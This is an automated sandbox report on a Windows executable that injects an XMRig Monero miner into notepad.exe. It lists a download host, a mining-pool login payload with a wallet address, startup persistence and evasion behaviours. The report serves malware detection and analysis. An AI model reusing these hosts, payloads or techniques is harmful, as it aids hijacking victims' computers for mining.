Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report 4rC1bQcnl5

Overview

General Information

Sample Name:4rC1bQcnl5 (renamed file extension from none to exe)
Analysis ID:453466
MD5:d572da9202196121d952231f26d65d07
SHA1:8934580e7ee3f3852e159298769bdd38bcaa12a0
SHA256:15337a846c1e262136124361b3624ddd3519cf3c7f93aba1ed75728a482fc662
Tags:32exe
Infos:

Most interesting Screenshot:

Detection

Xmrig
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
System process connects to network (likely due to code injection or exploit)
Yara detected Xmrig cryptocurrency miner
.NET source code contains potential unpacker
Allocates memory in foreign processes
Changes security center settings (notifications, updates, antivirus, firewall)
Creates a thread in another existing process (thread injection)
DNS related to crypt mining pools
Detected Stratum mining protocol
Found strings related to Crypto-Mining
Injects a PE file into a foreign processes
Modifies the context of a thread in another process (thread injection)
Sigma detected: WScript or CScript Dropper
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Antivirus or Machine Learning detection for unpacked file
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Stores files to the Windows start menu directory
Tries to load missing DLLs
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • 4rC1bQcnl5.exe (PID: 4924 cmdline: 'C:\Users\user\Desktop\4rC1bQcnl5.exe' MD5: D572DA9202196121D952231F26D65D07)
    • 4rC1bQcnl5.exe (PID: 4644 cmdline: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe MD5: D572DA9202196121D952231F26D65D07)
    • 4rC1bQcnl5.exe (PID: 5932 cmdline: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe MD5: D572DA9202196121D952231F26D65D07)
      • oQOWFbKllEKo.exe (PID: 3440 cmdline: C:\Program Files (x86)\EemhFwbGCKjPJmwwSNVcVmBXGbyfVGPxGbavDiSrUXISbGiVubNzBxBCESuBmCkMLWEVdYB\oQOWFbKllEKo.exe MD5: 77276DDC82248473D033E2494C438A97)
      • notepad.exe (PID: 5064 cmdline: 'C:\Windows\notepad.exe' -c 'C:\ProgramData\LKBNMTFJgl\cfg' MD5: BB9A06B8F2DD9D24C77F389D7B2B58D2)
      • cmd.exe (PID: 2952 cmdline: cmd.exe /C WScript 'C:\ProgramData\LKBNMTFJgl\r.vbs' MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 2176 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • wscript.exe (PID: 5056 cmdline: WScript 'C:\ProgramData\LKBNMTFJgl\r.vbs' MD5: 7075DD7B9BE8807FCA93ACD86F724884)
  • svchost.exe (PID: 1864 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5500 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5804 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5212 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5760 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 1544 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5920 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • SgrmBroker.exe (PID: 476 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)
  • svchost.exe (PID: 1260 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • MpCmdRun.exe (PID: 988 cmdline: 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable MD5: A267555174BFA53844371226F482B86B)
      • conhost.exe (PID: 5196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • svchost.exe (PID: 2880 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\viTRMUuKeV.urlMethodology_Contains_Shortcut_OtherURIhandlersDetects possible shortcut usage for .URL persistence@itsreallynick (Nick Carr)
    • 0x14:$file: URL=
    • 0x0:$url_explicit: [InternetShortcut]

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000012.00000002.495647676.00000000009D7000.00000040.00000001.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
      00000011.00000002.495500210.0000000001460000.00000040.00000001.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
        00000011.00000000.327781499.0000000001460000.00000040.00000001.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
          00000011.00000000.332660306.0000000001460000.00000040.00000001.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
            00000012.00000002.496766519.0000020F8DC2A000.00000004.00000040.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
              Click to see the 8 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              17.0.oQOWFbKllEKo.exe.1460000.1.raw.unpackJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
                16.2.4rC1bQcnl5.exe.400000.1.raw.unpackJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
                  17.2.oQOWFbKllEKo.exe.1460000.1.raw.unpackJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
                    17.0.oQOWFbKllEKo.exe.1460000.5.raw.unpackJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
                      16.2.4rC1bQcnl5.exe.400000.1.unpackJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
                        Click to see the 4 entries

                        Sigma Overview

                        System Summary:

                        barindex
                        Sigma detected: WScript or CScript DropperShow sources
                        Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (rule), oscd.community: Data: Command: WScript 'C:\ProgramData\LKBNMTFJgl\r.vbs', CommandLine: WScript 'C:\ProgramData\LKBNMTFJgl\r.vbs', CommandLine|base64offset|contains: Y'+, Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: cmd.exe /C WScript 'C:\ProgramData\LKBNMTFJgl\r.vbs', ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 2952, ProcessCommandLine: WScript 'C:\ProgramData\LKBNMTFJgl\r.vbs', ProcessId: 5056

                        Data Obfuscation:

                        barindex
                        Sigma detected: Drops script at startup locationShow sources
                        Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\SysWOW64\wscript.exe, ProcessId: 5056, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\viTRMUuKeV.url

                        Jbx Signature Overview

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection:

                        barindex
                        Antivirus detection for URL or domainShow sources
                        Source: http://45.144.225.135/notepad.exeAvira URL Cloud: Label: malware
                        Multi AV Scanner detection for dropped fileShow sources
                        Source: C:\ProgramData\LKBNMTFJgl\csrssReversingLabs: Detection: 23%
                        Source: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exeReversingLabs: Detection: 23%
                        Multi AV Scanner detection for submitted fileShow sources
                        Source: 4rC1bQcnl5.exeVirustotal: Detection: 17%Perma Link
                        Source: 4rC1bQcnl5.exeReversingLabs: Detection: 23%
                        Source: 17.0.oQOWFbKllEKo.exe.1460000.3.unpackAvira: Label: TR/ATRAPS.Gen
                        Source: 16.2.4rC1bQcnl5.exe.37c0000.4.unpackAvira: Label: TR/Dropper.Gen
                        Source: 17.0.oQOWFbKllEKo.exe.1460000.5.unpackAvira: Label: TR/ATRAPS.Gen
                        Source: 17.0.oQOWFbKllEKo.exe.1460000.1.unpackAvira: Label: TR/ATRAPS.Gen
                        Source: 16.2.4rC1bQcnl5.exe.400000.1.unpackAvira: Label: TR/ATRAPS.Gen
                        Source: 17.2.oQOWFbKllEKo.exe.1460000.1.unpackAvira: Label: TR/ATRAPS.Gen
                        Source: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exeCode function: 16_2_00408B20 CreateFileW,CryptAcquireContextW,CloseHandle,CryptCreateHash,CloseHandle,CryptReleaseContext,ReadFile,ReadFile,CryptHashData,CryptHashData,ReadFile,CryptReleaseContext,CryptDestroyHash,CloseHandle,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,FindCloseChangeNotification,16_2_00408B20
                        Source: C:\Program Files (x86)\EemhFwbGCKjPJmwwSNVcVmBXGbyfVGPxGbavDiSrUXISbGiVubNzBxBCESuBmCkMLWEVdYB\oQOWFbKllEKo.exeCode function: 17_2_01468B20 CreateFileW,CryptAcquireContextW,CloseHandle,CryptCreateHash,CloseHandle,CryptReleaseContext,ReadFile,ReadFile,CryptHashData,CryptHashData,ReadFile,CryptReleaseContext,CryptDestroyHash,CloseHandle,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,CloseHandle,17_2_01468B20

                        Bitcoin Miner:

                        barindex
                        Yara detected Xmrig cryptocurrency minerShow sources
                        Source: Yara matchFile source: dump.pcap, type: PCAP
                        Source: Yara matchFile source: 17.0.oQOWFbKllEKo.exe.1460000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 16.2.4rC1bQcnl5.exe.400000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 17.2.oQOWFbKllEKo.exe.1460000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 17.0.oQOWFbKllEKo.exe.1460000.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 16.2.4rC1bQcnl5.exe.400000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 17.0.oQOWFbKllEKo.exe.1460000.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 16.2.4rC1bQcnl5.exe.37c0000.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 18.2.notepad.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000012.00000002.495647676.00000000009D7000.00000040.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000011.00000002.495500210.0000000001460000.00000040.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000011.00000000.327781499.0000000001460000.00000040.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000011.00000000.332660306.0000000001460000.00000040.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000012.00000002.496766519.0000020F8DC2A000.00000004.00000040.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000010.00000002.496587950.0000000001480000.00000004.00000020.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000011.00000000.329749766.0000000001460000.00000040.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000012.00000002.493724592.0000000000401000.00000040.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000010.00000002.493674671.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000010.00000002.504581184.00000000037C0000.00000040.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: 4rC1bQcnl5.exe PID: 5932, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: oQOWFbKllEKo.exe PID: 3440, type: MEMORY
                        DNS related to crypt mining poolsShow sources
                        Source: unknownDNS query: name: xmr-us-east1.nanopool.org
                        Detected Stratum mining protocolShow sources
                        Source: global trafficTCP traffic: 192.168.2.5:49718 -> 192.99.69.170:14444 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"48qbpzutwm8gg6t6eg6h7jgxad6enjh8o3roylgbeqym7txydu9tfmfuugaheqa7bfdhtfb9d665cgydj6f5kvdjlegjmdw.worker/picktutos","pass":"x","agent":"xmrig/5.11.1 (windows nt 10.0; win64; x64) libuv/1.34.0 gcc/8.2.0","algo":["cn/0","cn/1","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn-lite/0","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","rx/0","rx/wow","rx/loki","rx/arq","argon2/chukwa","argon2/wrkz","astrobwt"]}}.
                        Source: global trafficTCP traffic: 192.168.2.5:49728 -> 192.99.69.170:14444 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"48qbpzutwm8gg6t6eg6h7jgxad6enjh8o3roylgbeqym7txydu9tfmfuugaheqa7bfdhtfb9d665cgydj6f5kvdjlegjmdw.worker/picktutos","pass":"x","agent":"xmrig/5.11.1 (windows nt 10.0; win64; x64) libuv/1.34.0 gcc/8.2.0","algo":["cn/0","cn/1","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn-lite/0","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","rx/0","rx/wow","rx/loki","rx/arq","argon2/chukwa","argon2/wrkz","astrobwt"]}}.
                        Found strings related to Crypto-MiningShow sources
                        Source: notepad.exe, 00000012.00000002.493724592.0000000000401000.00000040.00000001.sdmpString found in binary or memory: stratum+ssl://
                        Source: notepad.exe, 00000012.00000002.495647676.00000000009D7000.00000040.00000001.sdmpString found in binary or memory: CryptonightR_instruction0
                        Source: notepad.exe, 00000012.00000002.493724592.0000000000401000.00000040.00000001.sdmpString found in binary or memory: -o, --url=URL URL of mining server
                        Source: notepad.exe, 00000012.00000002.493724592.0000000000401000.00000040.00000001.sdmpString found in binary or memory: stratum+tcp://
                        Source: notepad.exe, 00000012.00000002.493724592.0000000000401000.00000040.00000001.sdmpString found in binary or memory: Usage: xmrig [OPTIONS]
                        Source: notepad.exe, 00000012.00000002.493724592.0000000000401000.00000040.00000001.sdmpString found in binary or memory: XMRig 5.11.1
                        Source: 4rC1bQcnl5.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
                        Source: 4rC1bQcnl5.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                        Source: Joe Sandbox ViewIP Address: 45.144.225.135 45.144.225.135
                        Source: Joe Sandbox ViewASN Name: OVHFR OVHFR
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.144.225.135
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.144.225.135
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.144.225.135
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.144.225.135
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.144.225.135
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.144.225.135
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.144.225.135
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.144.225.135
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.144.225.135
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.144.225.135
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.144.225.135
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.144.225.135
                        Source: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exeCode function: 16_2_00404B00 GetTickCount,GetTickCount,InternetCrackUrlA,InternetOpenA,InternetConnectA,InternetCloseHandle,GetTickCount,HttpOpenRequestA,GetTickCount,GetTickCount,InternetQueryOptionA,InternetSetOptionA,HttpSendRequestA,InternetReadFile,GetLastError,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,16_2_00404B00
                        Source: global trafficHTTP traffic detected: GET /config.txt HTTP/1.1Accept: text/*, application/exe, application/zlib, application/gzip, application/applefileUser-Agent: WinInetGet/0.1Host: 45.144.225.135Connection: Keep-AliveCache-Control: no-cache
                        Source: unknownDNS traffic detected: queries for: xmr-us-east1.nanopool.org
                        Source: 4rC1bQcnl5.exe, oQOWFbKllEKo.exeString found in binary or memory: http://45.144.225.135/config.txt
                        Source: 4rC1bQcnl5.exeString found in binary or memory: http://45.144.225.135/notepad.exe
                        Source: svchost.exe, 00000005.00000002.497319180.0000015D39A16000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
                        Source: svchost.exe, 00000005.00000002.497319180.0000015D39A16000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0:
                        Source: svchost.exe, 00000005.00000002.497265959.0000015D39A00000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.msocsp.com0
                        Source: svchost.exe, 00000005.00000002.494582549.0000015D344A3000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                        Source: svchost.exe, 00000005.00000002.498728475.0000015D39DF0000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
                        Source: svchost.exe, 00000005.00000002.494582549.0000015D344A3000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/enume
                        Source: svchost.exe, 0000000B.00000002.306846674.000002B69C413000.00000004.00000001.sdmpString found in binary or memory: http://www.bingmapsportal.com
                        Source: 4rC1bQcnl5.exe, 00000000.00000002.325812504.0000000001887000.00000004.00000040.sdmpString found in binary or memory: http://www.fontbureau.comion
                        Source: 4rC1bQcnl5.exe, 00000000.00000002.325812504.0000000001887000.00000004.00000040.sdmpString found in binary or memory: http://www.fontbureau.comm
                        Source: svchost.exe, 00000008.00000002.494230868.000001C8D463E000.00000004.00000001.sdmpString found in binary or memory: https://%s.dnet.xboxlive.com
                        Source: svchost.exe, 00000008.00000002.494230868.000001C8D463E000.00000004.00000001.sdmpString found in binary or memory: https://%s.xboxlive.com
                        Source: 4rC1bQcnl5.exe, 00000000.00000002.326329600.0000000003287000.00000004.00000001.sdmpString found in binary or memory: https://RtlGetVersionntdll.dll
                        Source: svchost.exe, 00000008.00000002.494230868.000001C8D463E000.00000004.00000001.sdmpString found in binary or memory: https://activity.windows.com
                        Source: svchost.exe, 0000000B.00000003.306504094.000002B69C461000.00000004.00000001.sdmpString found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
                        Source: svchost.exe, 00000008.00000002.494230868.000001C8D463E000.00000004.00000001.sdmpString found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
                        Source: svchost.exe, 00000008.00000002.494230868.000001C8D463E000.00000004.00000001.sdmpString found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
                        Source: svchost.exe, 0000000B.00000003.306561749.000002B69C45A000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
                        Source: svchost.exe, 0000000B.00000003.306561749.000002B69C45A000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
                        Source: svchost.exe, 0000000B.00000003.306504094.000002B69C461000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
                        Source: svchost.exe, 0000000B.00000002.306930208.000002B69C43D000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
                        Source: svchost.exe, 0000000B.00000003.306561749.000002B69C45A000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Traffic/Incidents/
                        Source: svchost.exe, 0000000B.00000003.306504094.000002B69C461000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
                        Source: svchost.exe, 0000000B.00000002.306962317.000002B69C44E000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
                        Source: svchost.exe, 0000000B.00000003.306561749.000002B69C45A000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/
                        Source: svchost.exe, 0000000B.00000003.306504094.000002B69C461000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
                        Source: svchost.exe, 0000000B.00000002.306930208.000002B69C43D000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
                        Source: svchost.exe, 0000000B.00000003.306504094.000002B69C461000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
                        Source: svchost.exe, 0000000B.00000003.306504094.000002B69C461000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
                        Source: svchost.exe, 0000000B.00000003.306504094.000002B69C461000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
                        Source: svchost.exe, 0000000B.00000003.306603433.000002B69C440000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
                        Source: svchost.exe, 0000000B.00000003.306603433.000002B69C440000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
                        Source: svchost.exe, 0000000B.00000003.306504094.000002B69C461000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
                        Source: svchost.exe, 0000000B.00000003.306603433.000002B69C440000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
                        Source: svchost.exe, 0000000B.00000003.306561749.000002B69C45A000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
                        Source: svchost.exe, 0000000B.00000003.306561749.000002B69C45A000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
                        Source: svchost.exe, 0000000B.00000003.306561749.000002B69C45A000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
                        Source: svchost.exe, 0000000B.00000002.306962317.000002B69C44E000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t
                        Source: svchost.exe, 0000000B.00000003.306504094.000002B69C461000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
                        Source: svchost.exe, 0000000B.00000002.306930208.000002B69C43D000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
                        Source: svchost.exe, 0000000B.00000003.284408088.000002B69C432000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
                        Source: 4rC1bQcnl5.exeString found in binary or memory: https://iconscout.com/legal#licenses
                        Source: svchost.exe, 0000000B.00000002.306930208.000002B69C43D000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
                        Source: svchost.exe, 0000000B.00000002.306846674.000002B69C413000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000002.306930208.000002B69C43D000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
                        Source: svchost.exe, 0000000B.00000003.284408088.000002B69C432000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
                        Source: svchost.exe, 0000000B.00000003.306593475.000002B69C445000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
                        Source: svchost.exe, 0000000B.00000003.284408088.000002B69C432000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
                        Source: svchost.exe, 0000000B.00000003.284408088.000002B69C432000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
                        Source: svchost.exe, 0000000B.00000002.306962317.000002B69C44E000.00000004.00000001.sdmpString found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
                        Source: notepad.exe, 00000012.00000002.493724592.0000000000401000.00000040.00000001.sdmpString found in binary or memory: https://xmrig.com/docs/algorithms
                        Source: notepad.exe, 00000012.00000002.493724592.0000000000401000.00000040.00000001.sdmpString found in binary or memory: https://xmrig.com/wizard
                        Source: notepad.exe, 00000012.00000002.493724592.0000000000401000.00000040.00000001.sdmpString found in binary or memory: https://xmrig.com/wizardOKcpurandomxversioncpuintensitythreadsaffinity
                        Source: 4rC1bQcnl5.exe, 00000000.00000002.325615282.0000000001460000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                        System Summary:

                        barindex
                        Malicious sample detected (through community Yara rule)Show sources
                        Source: 18.2.notepad.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                        Source: C:\Windows\notepad.exeProcess Stats: CPU usage > 98%
                        Source: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exeCode function: 16_2_00402E40 GetLastError,NtOpenSection,NtMapViewOfSection,NtClose,16_2_00402E40
                        Source: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exeCode function: 16_2_00408A50 NtOpenProcess,GetExitCodeProcess,NtClose,NtClose,16_2_00408A50
                        Source: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exeCode function: 16_2_004068E0 RtlDosPathNameToNtPathName_U,NtCreateFile,16_2_004068E0
                        Source: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exeCode function: 16_2_00407AF0 GetFileAttributesW,RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,NtClose,16_2_00407AF0
                        Source: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exeCode function: 16_2_00403680 NtCreateFile,16_2_00403680
                        Source: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exeCode function: 16_2_00403CA0 NtClose,GetSystemInfo,RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,NtClose,16_2_00403CA0
                        Source: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exeCode function: 16_2_00406340 GetModuleFileNameW,RtlDosPathNameToNtPathName_U,NtCreateFile,GetFileSizeEx,NtClose,VirtualAlloc,NtClose,NtReadFile,NtClose,VirtualFree,NtClose,RtlDosPathNameToNtPathName_U,VirtualFree,NtCreateFile,NtWriteFile,NtClose,VirtualFree,NtClose,VirtualFree,16_2_00406340
                        Source: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exeCode function: 16_2_00403B50 NtClose,16_2_00403B50
                        Source: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exeCode function: 16_2_00403720 NtCreateFile,NtCreateFile,16_2_00403720
                        Source: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exeCode function: 16_2_00403BC0 NtCreateFile,NtWriteFile,NtClose,NtClose,16_2_00403BC0
